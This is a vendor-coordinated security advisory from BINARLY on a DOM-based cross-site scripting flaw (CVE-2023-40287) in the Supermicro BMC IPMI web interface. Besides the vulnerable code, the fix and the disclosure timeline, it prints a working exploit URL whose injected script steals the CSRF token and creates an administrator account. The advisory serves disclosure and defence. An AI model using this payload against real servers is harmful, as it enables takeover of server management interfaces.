[BRLY-2023-008] Cross-site scripting vulnerability in Supermicro BMC IPMI firmware in the modify_nm_policy webpage using pdomain GET parameter
Summary
BINARLY team has discovered a DOM-based cross-site scripting (XSS) vulnerability in the modify_nm_policy webpage that uses pdomain GET parameter, included in the web server component of Supermicro BMC IPMI firmware, allowing a possible attacker to gain access to an account with administrator privileges.
Vulnerability Information
- BINARLY internal vulnerability identifier: BRLY-2023-008
- Supermicro PSIRT assigned CVE identifier: CVE-2023-40287
- BINARLY calculated CVSS v3.1: 9.6 Critical AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
- Supermicro PSIRT calculated CVSS v3.1: 8.3 High AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H
Affected Supermicro firmwares with confirmed impact by Binarly team
| Device | Version | SHA256 |
|---|---|---|
| X11SSM-F/X11SAE-F/X11SSE-F | 1.66 | dbc3842a5e3918463690fa165b2b0955989c00702bc7284af5875ef08e7606b1 |
Potential impact
An attacker could exploit this vulnerability to create an account with administrative privileges to the web server component of BMC IPMI software. Such account provides full acess to these settings: System Information, Chassis Locator Control, FRU Reading, Sensor Readings, Event Log, Alert, LDAP, Mouse Mode, Network, SMTP, SSL, Users, Event Action, Power Control, KVM, F/W Update, Logout. It also allows exploitation of vulnerabilities that require authentication.
Vulnerability description
modify_nm_policy HTML page contains the PageInit() JavaScript function, which is executed when the webpage is loaded. This function gets the value of the pdomain request parameter and then assigns it to the content of the HTML object with id = PolicyDomain using the innerHTML property without any sanitization.
function PageInit()
{
...
PolicyDomainOBJ = document.getElementById("PolicyDomain");
...
PolicyDomainOBJ.innerHTML = GetVars("pdomain");
...
function GetVars (str)
{
url = location.search;
var parameterList = url.split ("&");
for (var i = 0; i < parameterList.length; i++) {
parameter = parameterList[i].split ("=");
if (parameter[0] == str) {
return (decodeURIComponent (parameter[1]));
}
}
}
As a result, arbitrary JavaScript code can be injected into the webpage, which will be executed on behalf of the authenticated user.
Steps for exploitation
To create an administrator account with username BRLY and password BRLYBRLY an attacker can trick an authenticated user with administrative privileges to open this link in a web browser:
https://192.168.0.8:443/cgi/url_redirect.cgi?url_name=modify_nm_policy&pdomain=%3Cimg%20src%3d1%20onerror%3d'var csrfRegex%3d/CSRF_TOKEN", "([^"]*?)"/g;var csrfMatch%3dcsrfRegex.exec(document.body.innerHTML);var csrf%3dcsrfMatch[1];fetch("https://192.168.0.8:443/cgi/op.cgi",{method:"POST",headers:{"Csrf_token":csrf},body:"op%3dconfig_user%26username%3dBRLY%26original_username%3d2%26password%3dBRLYBRLY%26new_privilege%3d4%26_%3d"})'%3E
Here, the onerror event is used to execute JavaScript code when the browser tries to download a non-existenting image. The JS code first obtains the user's CSRF token and then uses it to make a POST request in order to create a user with administrative privileges and credentials defined by the attacker.
How to fix it
Ideally, user controlled parameters should not be assigned to HTML elements. If it is not possible in such case, the pdomain parameter must be checked against a whitelist of allowed values.
Disclosure timeline
This bug is subject to a 90 day disclosure deadline. After 90 days elapsed or a patch has been made broadly available (whichever is earlier), the bug report will become visible to the public.
| Disclosure Activity | Date (YYYY-mm-dd) |
|---|---|
| Supermicro PSIRT is notified | 2023-06-28 |
| Supermicro PSIRT confirmed reported issue | 2023-06-29 |
| Supermicro PSIRT assigned CVE number | 2023-08-17 |
| Supermicro PSIRT provide patch release | 2023-10-03 |
| BINARLY public disclosure date | 2023-10-03 |
Acknowledgements
BINARLY team